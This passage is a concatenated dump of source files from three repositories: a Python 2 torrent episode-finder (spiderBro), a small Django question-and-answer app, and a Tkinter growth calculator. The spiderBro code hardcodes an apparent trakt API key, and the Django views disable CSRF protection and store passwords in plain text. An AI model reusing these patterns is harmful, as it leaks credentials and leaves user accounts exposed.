series ID from tvdb: %s\" % sid)\n                self.db.add_show(sid, series_name, 0)\n                return sid\n            except Exception, e:\n                self.logger.error(\"Error retrieving series id: %s\" % e)\n\n\n    def get_episode_list(self, series_name):\n        \"\"\"\n        Return tuple:\n        (list) the list of episodes to be downloaded for a show, if any\n        (boolean) has_show_ended\n        (int) highest season in show\n        \"\"\"\n        aired_list = []\n        have_list = []\n        highest_season = 1\n        ended = False\n        self.logger.info(\"Looking for eps for: %s\" % (series_name))\n        # get the series id from db or web\n        series_id = self.get_series_id(series_name)\n        try:\n\n            self.logger.debug(\"Using thetvdb ID: %s\" % (series_id))\n            # now get the info for the series\n            data = BeautifulSoup(urllib2.urlopen(\"http://thetvdb.com/data/series/%s/all/\" % str(series_id))).data\n            if(data.series.status.string == \"Ended\"):\n                ended = True\n\n            # iterate through data, get list of season/episodes for show starting from 1 (0 are specials)\n            for i in data.findAll('episode', recursive=False):\n                if(i.seasonnumber.string != '0'):\n                    season = i.seasonnumber.string\n                    ep = i.episodenumber.string\n                    try:\n                        fa = i.firstaired.string.split('-')\n                        airdate = date(int(fa[0]), int(fa[1]), int(fa[2]))\n                        # need to compare current date to air date, ignore if not aired yet\n                        if date.today() > airdate:\n                            aired_list.append((season, ep))\n                            highest_season = max(highest_season, int(i.seasonnumber.string))\n                    except:\n                        pass\n        except:\n            self.logger.error(\"\\tCould not get episode list from thetvdb (timeout or invalid ID? Using ID: %s)\" % (series_id))\n            self.logger.error(\"\")\n            return [], False, highest_season\n\n        try:\n            # use the mysql lib to access xbmc db, cross check episode lists\n            l = self.db.xbmc_get_eps_for_show(series_name)\n            for i in l: have_list.append(i)\n\n            # create new db connection to torrents db, populate from here as well\n            l = self.db.get_eps_from_self(series_name)\n            for s, e in l: have_list.append((str(s), str(e)))\n\n        except ValueError as v:\n            self.logger.error(\"Database error?\")\n            self.logger.error(str(v))\n            sys.exit()\n\n        have_s = list(set([h[0] for h in have_list]))\n        aired_s = list(set([a[0] for a in aired_list]))\n        if(ended):\n            seas = [c for c in aired_s if c not in have_s]\n        else:\n            seas = [c for c in aired_s if((c not in have_s) and (int(c) < highest_season))]\n\n        have_seas = [val for val in have_list if val[1] == \"-1\"]\n        ep_list = [val for val in aired_list if val not in have_list]\n\n        for s in seas:\n            ep_list = [c for c in ep_list if c[0] != s]\n            ep_list.append((s, \"-1\"))\n        for h in have_seas:\n            ep_list = [c for c in ep_list if c[0] != h[0]]\n\n        return ep_list, ended, highest_season\n\n    def normalize_series_name(self, name):\n        \"\"\"\n        Return the tv show name stripped of any special characters, spaces replaced with _ and all in lower case\n        \"\"\"\n        normalized_showname = str(name)\n        normalized_showname = str.lower(normalized_showname)\n        normalized_showname = normalized_showname.replace(\"::\", \"\")\n        normalized_showname = normalized_showname.replace(\": \", \" \")\n        normalized_showname = normalized_showname.replace(\":\", \" \")\n        normalized_showname = \"\".join(ch for ch in normalized_showname if ch not in [\"!\", \"'\", \":\", \"(\", \")\", \".\", \",\"])\n        normalized_showname = normalized_showname.replace(\"&\", \"and\")\n        normalized_showname = normalized_showname.replace(\" \", \"_\") \n        return normalized_showname\n    \n    def hunt_eps(self, series_name):\n        \"\"\"\n        Find episodes on various torrent sites for some show\n        \"\"\"\n        normalized_showname = 
self.normalize_series_name(series_name)\n        dir = self.config.tv_dir + normalized_showname\n        \n        is_high_quality = self.db.get_show_high_quality(series_name)\n\n        ep_list, ended, highest_season = self.get_episode_list(series_name)\n\n        if ended and not ep_list:\n            self.logger.info(\"\\tGot all episodes for this, skipping in future\")\n            self.db.mark_show_finished(series_name)\n        elif ep_list:\n            # search for sX eX using every search site and every filemask until torrent is found\n            for s, e in ep_list:\n                found = False\n                # if searching for a full season use the season mask list\n                if(e == \"-1\"):\n                    self.logger.info(\"Searching for entire season %s of %s\" % (s, series_name))\n                    masks_list = self.season_masks\n                else:\n                    masks_list = self.episode_masks\n                for torrent_site_searcher_class in self.site_search_list:\n                    if not found:\n                        for mk_ctor in masks_list:\n                            if self.config.polite: time.sleep(self.config.polite_value)\n                            site = torrent_site_searcher_class()\n                            try:\n                                url = site.search(series_name, s, e, mk_ctor, self.ignore_taglist, is_high_quality)\n                                if url:\n                                    self.logger.info(\"\\t\\tFound torrent: %s\" % url)\n                                    save_dir = dir\n                                    if(self.config.use_file_renamer):\n                                        save_dir = dir + \"s\" + s + \"e\" + e\n                                    download_info = {'url':url, \"save_dir\":save_dir, 'showname':series_name, \"season\":s, \"episode\":e}\n                                    self.download_list.append(download_info)\n                                    found = True\n                                    break\n                            except AttributeError as ex:\n                                self.logger.error(\"%s timed out?\" % ex)\n                            except Exception, e:\n                                self.logger.error(\"Error: %s\" % e)\n                                traceback.print_exc()\n                                #sys.exit()\n                if not found:\n                    #check episode is not in current season, do not search again if so\n                    ep_season = int(s)\n                    # something goes weird here; self.config.force_learn always evaluates as True using 'or self.config.force_learn' - why?\n                    if ((ep_season < highest_season) or ended or self.config.force_learn == True):\n                        self.logger.info(\"Cannot find torrent for: %s season %s episode %s - skipping this in future\" % (series_name, s, e))\n                        self.db.add_to_urls_seen(series_name, s, e, \"None\", \"None\")\n        self.logger.info(\"\")\n\n    def get_torrent_download_list(self):\n        \"\"\"\n        Searches for episodes of shows, populates spiderBro's internal list of shows/urls to get\n        \"\"\"\n        ignore_list = self.db.get_ignore_list()\n\n        if(self.config.all):\n            # if ALL, we get the complete list of shows from xbmc, minus the finished shows (if any)\n            self.logger.info(\"Scanning entire XBMC library, this could take some time...\")\n            full_showlist = []\n            db_showlist = self.db.xbmc_get_showlist()\n            for show in db_showlist:\n                if(show[0].decode('latin-1', 'replace') not in ignore_list): full_showlist.append(show[0])\n            #TODO: add this to config file\n            get_trakt_watch_list = True\n            if(get_trakt_watch_list):\n                self.logger.info(\"Looking for shows from trakt.com watchlist\")\n                # get the watchlist from trakt and add\n                traktlist = traktWatchlistScraper(\"thegom145\", \"b837e9f111dcae8e279711ce929e9ef1\")\n                full_showlist.extend(t for t in traktlist if t.decode('latin-1', 'replace') not in ignore_list and t not in full_showlist)\n            full_showlist.sort()\n            for show in full_showlist:\n                if(show.decode('latin-1', 'replace') not in ignore_list):\n                    self.hunt_eps(show)\n\n        else:\n            # if SHOW, get specified show\n            if(self.config.show):\n                self.hunt_eps(self.config.show)\n            \n            # else EXIT\n            else:\n                self.logger.info(\"No shows to download, exiting\")\n\n        return self.download_list\n\ndef traktWatchlistScraper(username, key):\n    \"\"\"\n    returns a list of shows from the watchlist of a trakt user\n    \"\"\"\n    watchlist = []\n    try:\n        l = 
logging.getLogger(\"spiderbro\")\n        url = \"http://api.trakt.tv/user/watchlist/shows.json/\"+ key +\"/\" + username\n        response = urllib2.urlopen(url)\n        data = json.load(response)\n        watchlist = [i[\"title\"] for i in data]\n        l.debug(\"Got list of watched shows from trakt.com:\")\n        for show in watchlist: l.debug(show)\n    except:\n        pass\n" }, { "alpha_fraction": 0.5844562649726868, "alphanum_fraction": 0.5935443639755249, "avg_line_length": 36.97618865966797, "blob_id": "f579827f01238135a63b50f57bf3344ae8f55f04", "content_id": "b3d1db2389df29e04139644373d4c1fc89950359", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3191, "license_type": "no_license", "max_line_length": 105, "num_lines": 84, "path": "/gomXBMCTools.py", "repo_name": "GrahamOMalley/spiderBro", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\nimport unicodedata\nimport unittest\nimport re\n\ndef normaliseTVShowName(series_name):\n    \"\"\" \n    Uses normalization rules to change string to lowercased with _ instead of space\n    and removes characters that are problematic for shell/dirnames\n    \"\"\"\n    series_name = str.lower(series_name)\n    series_name = series_name.replace(\"::\", \"\")\n    series_name = series_name.replace(\": \", \" \")\n    series_name = series_name.replace(\":\", \" \")\n    series_name = series_name.replace(\";\", \" \")\n    series_name = series_name.replace(\"&\", \"and\")\n    series_name = series_name.replace(\" \", \"_\") \n    series_name = series_name.replace(\"/\", \"_\") \n    series_name = series_name.replace(\"\\\\\", \"_\") \n    series_name = series_name.replace(\"_-_\", \"_\") \n    series_name = \"\".join(ch for ch in series_name if ch not in [\"!\", \"'\", \":\", \"(\", \")\", \".\", \",\", \"-\"])\n    # unicode screws up some shows, convert to latin-1 ascii\n    series_name = unicode(series_name, \"latin-1\")\n    series_name = unicodedata.normalize('NFKD', series_name).encode('ascii','ignore')\n    return series_name\n\ndef getTorrentNameFromMagnetLink(torrent):\n    tor = re.sub(\"&tr.*$\", \"\", torrent)\n    tor = re.sub(\"magnet.*=\", \"\", tor)\n    return tor\n\ndef getEpisodeNumFromFilename(file, s):\n    \"\"\" \n    getEpisodeNumFromFilename(file): parse filename, return episode number\n    \"\"\" \n    sNeN = re.compile(\".*s01e([0-9][0-9]).*\")\n    gr = sNeN.findall(file)\n    try:\n        if(gr[0]):\n            return \"e\"+str(gr[0])\n    except:\n        pass\n    \n\n    return \"e-1\"\n\ndef formatNoAsStr(no):\n    \"\"\" \n    formatSeasonOrEpNo(): pad a zero if no < 10, else do nothing\n    \"\"\"\n    return \"0\" + str(no) if(int(no)<10) else str(no)\n\nclass testFunctions(unittest.TestCase):\n\n    def setUp(self):\n        self.shows = { \"Adam And Joe Go Tokyo\":\"adam_and_joe_go_tokyo\",\n                        \"American Dad!\":\"american_dad\",\n                        \"Archer (2009)\":\"archer_2009\",\n                        \"Avatar: The Last Airbender\":\"avatar_the_last_airbender\",\n                        \"Berry & Fulcher's Snuff Box\":\"berry_and_fulchers_snuff_box\",\n                        \"Charlie Brooker's Screenwipe\":\"charlie_brookers_screenwipe\",\n                        \"Eastbound & Down\":\"eastbound_and_down\",\n                        \"Lucy, The Daughter of the Devil\":\"lucy_the_daughter_of_the_devil\",\n                        \"Penn & Teller: Bullshit!\":\"penn_and_teller_bullshit\",\n                        \"Penn & Teller: Fool Us\":\"penn_and_teller_fool_us\",\n                        \"Star Wars - The Clone Wars\":\"star_wars_the_clone_wars\",\n                        \"Beavis and Butt-Head\":\"beavis_and_butthead\",\n                        \"Don't Trust the B---- in Apartment 23\":\"dont_trust_the_b_in_apartment_23\",\n                        \"Louis Theroux - Extreme Love\":\"louis_theroux_extreme_love\",\n                        \"NTSF:SD:SUV::\":\"ntsf_sd_suv\",\n                        \"The Venture Bros.\":\"the_venture_bros\",\n                        
\"Steins;Gate\":\"steins_gate\",\n \"Love/Hate\":\"love_hate\"\n }\n\n def test_normalise(self):\n for k,v in self.shows.items():\n #print normaliseTVShowName(k), \" <-> \", v\n self.assertEqual(normaliseTVShowName(k), v)\n\nif __name__ == \"__main__\":\n # unit tests\n suite = unittest.TestLoader().loadTestsFromTestCase(testFunctions)\n unittest.TextTestRunner(verbosity=2).run(suite)\n\n" } ]
7
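The get_configuration function in the spiderBro record above uses the layered-configuration idiom: a minimal pre-parser reads only --conf_file, and the full parser then takes its defaults from the INI file, so precedence is command line over config file over hard-coded defaults. Below is a minimal, self-contained Python 3 sketch of the same idiom; the repo itself targets Python 2, and the section name and option names here are illustrative assumptions, not taken verbatim from the project.

import argparse
import configparser

def parse_args(argv=None):
    # Stage 1: only learn where the config file lives; add_help=False defers -h
    # to the full parser below.
    conf_parser = argparse.ArgumentParser(add_help=False)
    conf_parser.add_argument("--conf_file", metavar="FILE")
    args, remaining_argv = conf_parser.parse_known_args(argv)

    defaults = {}
    if args.conf_file:
        config = configparser.ConfigParser()
        config.read([args.conf_file])
        defaults = dict(config.items("spiderbro"))

    # Stage 2: the real parser inherits --conf_file and applies the file-based
    # defaults, so explicit command-line flags still win.
    parser = argparse.ArgumentParser(parents=[conf_parser])
    parser.add_argument("--tv_dir", default="/tmp/tv")
    parser.set_defaults(**defaults)
    return parser.parse_args(remaining_argv)

if __name__ == "__main__":
    print(parse_args())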
Jaskom/que_ans
https://github.com/Jaskom/que_ans
d72687cc767d3eee58868d80a0e17fd0c6b5d692
3f8b15201a55dd6bed0e977f6ad042cc05008d40
c13caeea81b7d2f9eb5dea449b93bf045bf05b55
refs/heads/master
2016-09-10T22:43:42.989172
2013-07-03T09:17:51
2013-07-03T09:17:51
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7631579041481018, "alphanum_fraction": 0.7631579041481018, "avg_line_length": 36, "blob_id": "60c5c7f1c08be7c0acc3183d33d808b08f988937", "content_id": "ee9ee68e4b7e7b7a1d784bcc8ddad7bab55f3586", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 152, "license_type": "no_license", "max_line_length": 58, "num_lines": 4, "path": "/que_ans_app/forms.py", "repo_name": "Jaskom/que_ans", "src_encoding": "UTF-8", "text": "from django import forms\nclass QuestionForm(forms.Form):\n que_owner=forms.CharField()\n que_description=forms.CharField(widget=forms.Textarea)\n \n" }, { "alpha_fraction": 0.6270467042922974, "alphanum_fraction": 0.6349302530288696, "avg_line_length": 38.975608825683594, "blob_id": "e301844d6e0f627c04b79b8c5a3026ff1f8d765f", "content_id": "a1cc5623b59b4f7699792a7d9b1b2383caedc0dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1649, "license_type": "no_license", "max_line_length": 140, "num_lines": 41, "path": "/que_ans_app/tests.py", "repo_name": "Jaskom/que_ans", "src_encoding": "UTF-8", "text": "\"\"\"\nThis file demonstrates writing tests using the unittest module. These will pass\nwhen you run \"manage.py test\".\n\nReplace this with more appropriate tests for your application.\n\"\"\"\n\nfrom django.test import TestCase\nfrom django.test.client import Client\nimport datetime\nfrom que_ans_app.models import Question\n\nclass SimpleTest(TestCase):\n # def test_basic_addition(self):\n # \"\"\"\n # Tests that 1 + 1 always equals 2.\n # \"\"\"\n # self.assertEqual(1 + 1, 2)\n def test_add_question(self):\n c=Client()\n response=c.post('/add/',{'que_owner':'ylh', 'que_description':'how to write django unittest',\n 'que_publish_time':datetime.datetime.now().strftime(\"%Y-%m-%d\")})\n print(response.status_code)\n self.assertEqual(response.status_code, 200)\n def test1_add_question(self):\n c=Client()\n response=c.post('/add/',{'que_owner':'JasonnnnnnnnnnnnnnnnnJasonnnnnnnnnnnnnnnnn', 'que_description':'how to write django unittest',\n 'que_publish_time':datetime.datetime.now().strftime(\"%Y-%m-%d\")})\n \n #self.assertEqual(response.status_code, 200)\n \nclass QuestionTest(TestCase):\n def setUp(self):\n que_owner='ylh'\n que_description='how to write django unittest'\n que_publish_time=(datetime.datetime.now().strftime(\"%Y-%m-%d\"))\n question=Question(que_owner=que_owner,que_description=que_description,que_publish_time=que_publish_time)\n question.save()\n def test_queList(self):\n question=Question.objects.get(que_owner='ylh')\n print(question)\n \n\n" }, { "alpha_fraction": 0.6663163304328918, "alphanum_fraction": 0.6915396451950073, "avg_line_length": 28.734375, "blob_id": "e60f08c555ff9273b14977262631e1ea87a71953", "content_id": "d5f3031aa02c2791d16b1c1b8ea1e3abdd0b1f61", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1903, "license_type": "no_license", "max_line_length": 59, "num_lines": 64, "path": "/que_ans_app/models.py", "repo_name": "Jaskom/que_ans", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib import admin\n# Create your models here.\n\n\nclass Question(models.Model):\n que_owner = models.CharField(max_length=20)\n que_description = models.TextField()\n que_publish_time = models.DateField()\n\n def __unicode__(self):\n return self.que_description\n\n class Admin:\n pass\n\n\nclass Answer(models.Model):\n ans_description = 
models.TextField()\n    ans_publish_time = models.DateField()\n    question = models.ForeignKey(Question)\n\n    def __unicode__(self):\n        \"\"\"Return the answer text.\"\"\"\n        return self.ans_description\n\n\nclass Blog(models.Model):\n    blog_id = models.AutoField(primary_key=True)\n    blog_title = models.CharField(max_length=100)\n    blog_content = models.TextField()\n    blog_owner = models.IntegerField()\n    blog_publish_time = models.DateTimeField()\n    blog_sort = models.CharField(blank=True, max_length=50)\n    blog1 = models.CharField(blank=True, max_length=50)\n    blog2 = models.CharField(blank=True, max_length=50)\n    blog3 = models.CharField(blank=True, max_length=50)\n    blog4 = models.CharField(blank=True, max_length=50)\n\n\nclass User(models.Model):\n    user_id=models.AutoField(primary_key=True)\n    user_email = models.EmailField()\n    user_password = models.CharField(max_length=50)\n    user1 = models.CharField(blank=True, max_length=50)\n    user2 = models.CharField(blank=True, max_length=50)\n    user3 = models.CharField(blank=True, max_length=50)\n    user4 = models.CharField(blank=True, max_length=50)\n    user5 = models.CharField(blank=True, max_length=50)\n    user6 = models.CharField(blank=True, max_length=50)\n    user7 = models.CharField(blank=True, max_length=50)\n    user8 = models.CharField(blank=True, max_length=50)\n    user9 = models.CharField(blank=True, max_length=50)\n\n    class Admin:\n        pass\n\n\nadmin.site.register(Question)\nadmin.site.register(Answer)\n" }, { "alpha_fraction": 0.6681567430496216, "alphanum_fraction": 0.6697344183921814, "avg_line_length": 29.158729553222656, "blob_id": "70b4126f338ac3edb70663a748cc5f23a601ee12", "content_id": "bffaf47c405aaf9b15ead541896d345dcd03e0fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3803, "license_type": "no_license", "max_line_length": 112, "num_lines": 126, "path": "/que_ans_app/views.py", "repo_name": "Jaskom/que_ans", "src_encoding": "UTF-8", "text": "# Create your views here.\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.template import loader,Context\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom que_ans_app.models import Question\nfrom que_ans_app.models import Answer\nfrom que_ans_app.models import User\nfrom django.core.paginator import Paginator,InvalidPage,EmptyPage\nimport datetime\n\n@csrf_exempt\ndef addQuestion(request):\n    errors=[] \n    que_owner=request.POST.get('owner')\n    que_description=request.POST.get('des')\n    if not que_owner:\n        errors.append('the Publisher is required')\n    if not que_description:\n        errors.append('the Question is required')\n    if not errors:\n        que_publish_time=(datetime.datetime.now().strftime(\"%Y-%m-%d\"))\n        question=Question(que_owner=que_owner,que_description=que_description,que_publish_time=que_publish_time)\n        question.save()\n        return HttpResponseRedirect(\"/list/\")\n    else:\n        return render_to_response('addQuestion.html',{'errors':errors})\n    \n    \ndef listQuestions(request):\n    que_list=Question.objects.all()\n    paginator = Paginator(que_list, 5)\n    try:\n        page = int(request.GET.get('page', '1'))\n    except ValueError:\n        page = 1\n\n    try:\n        questions = paginator.page(page)\n    except (EmptyPage, InvalidPage):\n        questions = paginator.page(paginator.num_pages)\n    t=loader.get_template(\"listQuestions.html\")\n    c=Context({'questions':questions})\n    return HttpResponse(t.render(c))\n\ndef queryById(request):\n    offset=request.GET.get('id')\n   # print offset\n    
question=Question.objects.get(id=offset)\n    #print question.id\n    ans_list=Answer.objects.filter(question_id=offset)\n\n    paginator = Paginator(ans_list, 5)\n    try:\n        page = int(request.GET.get('page', '1'))\n    except ValueError:\n        page = 1\n\n    try:\n        answers = paginator.page(page)\n    except (EmptyPage, InvalidPage):\n        answers = paginator.page(paginator.num_pages)\n\n    t=loader.get_template(\"ans_que.html\")\n    #c=Context({'question':question})\n    c=Context({'question':question,'answers':answers})\n    return HttpResponse(t.render(c))\n\n@csrf_exempt\ndef saveAanswer(request):\n    \"\"\"\n    saves an answer for a question, then redirects back to that question\n    \"\"\"\n    errors=[]\n    ans_description=request.POST.get(\"ans_description\")\n    question_id=request.POST.get(\"question_id\")\n    if not ans_description:\n        errors.append('the Answer is required')\n    print question_id\n    if not errors:\n        ans_publish_time=(datetime.datetime.now().strftime(\"%Y-%m-%d\"))\n        answer=Answer(ans_description=ans_description,ans_publish_time=ans_publish_time,question_id=question_id)\n        answer.save()\n    return HttpResponseRedirect(\"/query/?id=\"+question_id)\n\n\ndef register(request):\n    errors = []\n    user_email = request.POST.get('email')\n    user_password = request.POST.get('password')\n    if not user_email:\n        errors.append(\"user_email is required\")\n    if not user_password:\n        errors.append(\"user_password is required\")\n    if not errors:\n        user = User(user_email=user_email, user_password=user_password)\n        user.save()\n        return HttpResponseRedirect(\"/\")\n    return render_to_response(\"register.html\", {'errors': errors})\n\n\ndef login(request):\n    errors = []\n    user_email = request.POST.get('email')\n    user_password = request.POST.get('password')\n    if not user_email:\n        errors.append(\"user_email is required\")\n    if not user_password:\n        errors.append(\"user_password is required\")\n    if not errors:\n        # look up the existing user instead of saving a duplicate record\n        if User.objects.filter(user_email=user_email, user_password=user_password).exists():\n            return HttpResponseRedirect(\"/\")\n        errors.append(\"invalid email or password\")\n    return render_to_response(\"register.html\", {'errors': errors})\n\n\ndef preregister(request):\n    return render_to_response(\"register.html\")\n\n\ndef index(request):\n    \"\"\"\n    renders the landing page\n    \"\"\"\n    return render_to_response(\"index.html\")\n\n\n\n" }, { "alpha_fraction": 0.6872393488883972, "alphanum_fraction": 0.6872393488883972, "avg_line_length": 35.33333206176758, "blob_id": "6cc66dbf3f167574852e8bd8515a658f6ad7d79b", "content_id": "9f53794d3d8655ba6cbcc2b4c39c2d5ad85e95dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1199, "license_type": "no_license", "max_line_length": 71, "num_lines": 33, "path": "/que_ans/urls.py", "repo_name": "Jaskom/que_ans", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\nfrom que_ans_app.views import addQuestion\nfrom que_ans_app.views import listQuestions\nfrom que_ans_app.views import queryById\nfrom que_ans_app.views import index\nfrom que_ans_app.views import saveAanswer\nfrom que_ans_app.views import preregister\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns \n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n    # Examples:\n    # url(r'^$', 'que_ans.views.home', name='home'),\n    # url(r'^que_ans/', include('que_ans.foo.urls')),\n\n    # Uncomment the admin/doc line below to enable admin documentation:\n    url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n    # Uncomment the next line to enable the admin:\n    url(r'^admin/', include(admin.site.urls)),\n    url(r'^$', index),\n    url(r'^add/$', addQuestion),\n    url(r'^list/$', listQuestions),\n    url(r'^preregister/$', preregister),\n    url(r'^query/$', queryById),\n    
url(r'^saveAns/$', saveAanswer),\n url(r'^static/(?P<path>.*)$', 'django.views.static.serve',\n {'document_root': '/dgproject/que_ans/static'}\n ),\n\n)\n" } ]
5
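The que_ans views above repeat Django's defensive pagination idiom: build a Paginator, coerce the requested page number, and fall back to the last page when the request is out of range. A minimal sketch of that idiom in isolation, assuming only a plain Python list in place of the app's QuerySet:

from django.core.paginator import Paginator, EmptyPage, InvalidPage

def get_page(object_list, raw_page, per_page=5):
    paginator = Paginator(object_list, per_page)
    try:
        page = int(raw_page)
    except (TypeError, ValueError):
        # non-numeric or missing page parameters default to the first page
        page = 1
    try:
        return paginator.page(page)
    except (EmptyPage, InvalidPage):
        # out-of-range requests fall back to the last available page
        return paginator.page(paginator.num_pages)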
EMeyerLab/PTGC
https://github.com/EMeyerLab/PTGC
7dfeac3cf1679f3594312bb56c12f03e01d185fb
d836e1745206ace74266646605ad89fe36e914a6
f40cef4b9ce53687b02f75dfd4fcd4a5c936d6ad
refs/heads/master
2022-04-02T15:53:55.086980
2020-01-28T16:51:09
2020-01-28T16:51:09
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7236084342002869, "alphanum_fraction": 0.7312859892845154, "avg_line_length": 19.660377502441406, "blob_id": "88eaa0213ed3d13c33ed3d3eb9c122a2f805cceb", "content_id": "c81acebb07b0de0a7661b8aae9bb89237d77b1db", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1042, "license_type": "permissive", "max_line_length": 219, "num_lines": 53, "path": "/README.md", "repo_name": "EMeyerLab/PTGC", "src_encoding": "UTF-8", "text": "# PTGC\n\nParamecium tetraurelia Growth Calculator\n\nA GUI program to help experimentalists with repetitive calculations of population growth for Paramecium tetraurelia\n\n# Principle\n\n![Equations](./images/equations.png)\n\n# Screenshot\n\n![Screenshot](./images/screenshot_app.png)\n\n\n# Installation\n\n## Windows\n\n- Go download the v1.0 at https://github.com/GDelevoye/PTGC/releases/tag/1.0\n\n- Download the **.exe and the .dll file**\n\n- **Put them in the same directory**\n\n- **Double click on the .exe file to launch PTGC**\n\n## Linux, MacOS (command-line)\n\n```bash\nuser@computer$:git clone https://github.com/GDelevoye/PTGC.git\nuser@computer$:pip install ./PTGC\n```\n\n# Usage\n\n## Linux, MACOS\n\n```bash\nuser@computer$:PTGC_GUI\n```\n\n## Known trouble\n\n> For people under MacOS **Mojave**, Tkinter/Python causes a crash/restart of the desktop. This is a well-known issue. The problem seems to come from MacOS itself and was apparently resolved with the **Catalina** update.\n\n## Windows\n\nJust use the .exe file as described earlier\n\n# Credits\n\nGuillaume DELEVOYE - 2020\n" }, { "alpha_fraction": 0.5070422291755676, "alphanum_fraction": 0.5446009635925293, "avg_line_length": 15.384614944458008, "blob_id": "f269bf35e0c4b117f5e827a8d6715a35d5ca8dfc", "content_id": "d7aa089017fa4a9cb699dd7d5dcc2d7e2768828d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 213, "license_type": "permissive", "max_line_length": 32, "num_lines": 13, "path": "/PTGC/calculations.py", "repo_name": "EMeyerLab/PTGC", "src_encoding": "UTF-8", "text": "import math\n\n# Population model: Un = U0 * q**n\n\ndef get_q(Un, n, U0):\n    return (Un / U0) ** (1.0 / n)\n\ndef get_n(Un, U0, q):\n    return math.log(Un / U0) / math.log(q)\n\ndef get_U0(Un, n, q):\n    return Un / q ** n\n\ndef get_Un(U0, q, n):\n    return U0 * q ** n\n" }, { "alpha_fraction": 0.8125, "alphanum_fraction": 0.8125, "avg_line_length": 31, "blob_id": "f9910cc2d125a1e16bd91bc1db74a5d60e6d7cf0", "content_id": "bbec776b80ae9b5c1597a4fae0d6644641735d18", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32, "license_type": "permissive", "max_line_length": 31, "num_lines": 1, "path": "/PTGC/__init__.py", "repo_name": "EMeyerLab/PTGC", "src_encoding": "UTF-8", "text": "from PTGC.calculations import *\n" }, { "alpha_fraction": 0.7894737124443054, "alphanum_fraction": 0.7894737124443054, "avg_line_length": 37, "blob_id": "11e793d93d63ab5aa19837acc1e78433c4551485", "content_id": "929f646d467bff29b41751c4cd06f99bcf431ac3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 38, "license_type": "permissive", "max_line_length": 37, "num_lines": 1, "path": "/PTGC/launchers/__init__.py", "repo_name": "EMeyerLab/PTGC", "src_encoding": "UTF-8", "text": "from PTGC.launchers.PTGC_GUI import *\n" }, { "alpha_fraction": 0.5565506815910339, "alphanum_fraction": 0.5800921320915222, "avg_line_length": 25.76712417602539, 
"blob_id": "a148ad6d3bf57ed2be1499281805b66e865b5fdd", "content_id": "e2aa5628a846f1a6c777d7ad30e1eb4a6097f53e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3909, "license_type": "permissive", "max_line_length": 130, "num_lines": 146, "path": "/PTGC/launchers/PTGC_GUI.py", "repo_name": "EMeyerLab/PTGC", "src_encoding": "UTF-8", "text": "import PTGC as tc\n\nimport PIL.Image\nfrom PIL import ImageTk\n\nfrom math import log\nimport os\nfrom tkinter import *\n\ndef get_q(Un, n, U0):\n return log(Un/U0) / (n*log(2))\n\ndef get_n(Un, U0, q):\n return log(Un/U0) / (q*log(2))\n\ndef get_U0(Un, n, q):\n return Un/(2**(n*q))\n\ndef get_Un(U0, q, n):\n return U0*(2**(n*q))\n\ndef calculer(U0, n, q, Un, fields):\n # print(U0,n,q,Un)\n\n vU0 = U0.get()\n vn = n.get()\n vq = q.get()\n vUn = Un.get()\n\n\n missings = []\n answer = \"\"\n output = \"When we have the followings : \"\n\n if not vU0:\n missings.append(\"U0\")\n else:\n output = output+\" U0={} \".format(vU0)\n if not vn:\n missings.append(\"n\")\n else:\n output = output+\" n={} \".format(vn)\n if not vq:\n missings.append(\"q\")\n else:\n output = output+\" q={} \".format(vq)\n if not vUn:\n missings.append(\"Un\")\n else:\n output = output+\" Un={} \".format(vUn)\n\n if len(missings) > 1:\n answer = \" --> Then we don't have enough information to compute anything\"\n elif len(missings) == 0:\n answer = \" --> Then nothing needs to be computed\"\n elif len(missings) == 1:\n if missings[0] == \"U0\":\n answer = \", then we can guess that {} = {}\".format(\"U0\",str(get_U0(float(vUn), float(vn),float(vq))))\n if missings[0] == \"n\":\n answer = \", then we can guess that {} = {}\".format(\"n\",str(get_n(float(vUn), float(vU0),float(vq))))\n if missings[0] == \"q\":\n answer = \", then we can guess that {} = {}\".format(\"q\",str(get_q(float(vUn), float(vn), float(vU0))))\n if missings[0] == \"Un\":\n answer = \", then we can guess that {} = {}\".format(\"Un\",str(get_Un(float(vU0),float(vq),float(vn))))\n output = output + answer\n\n U0.set(\"\")\n n.set(\"\")\n q.set(\"\")\n Un.set(\"\")\n\n\n champs5 = Label(fields,text=\"{}\".format(output))\n champs5.config(font=(\"Times New Roman\", 15))\n champs5.pack()\n fields.pack()\n\n\n\ndef PTGC_GUI():\n fenetre = Tk()\n fenetre.title(\"PTGC\")\n fenetre.resizable(height = None, width = None)\n\n # img_path = os.path.abspath(os.path.dirname(__file__)+\"/../../images/\")\n # imgicon = PhotoImage(file=os.path.join(img_path,'icone.ppm'))\n # fenetre.tk.call('wm', 'iconphoto', fenetre._w, imgicon)\n\n fenetre.geometry('800x480')\n ############\n\n\n fields = Frame(fenetre)\n\n top_msg = Label(fields,text=\"\"\"\n Enter 3 parameters among those 4:\n \"\"\")\n top_msg.config(font=(\"Arial\",22))\n top_msg.pack()\n\n champs1 = Label(fields,text=\"Number of cells at J0 ? (U0)\")\n champs1.config(font=(\"Times New 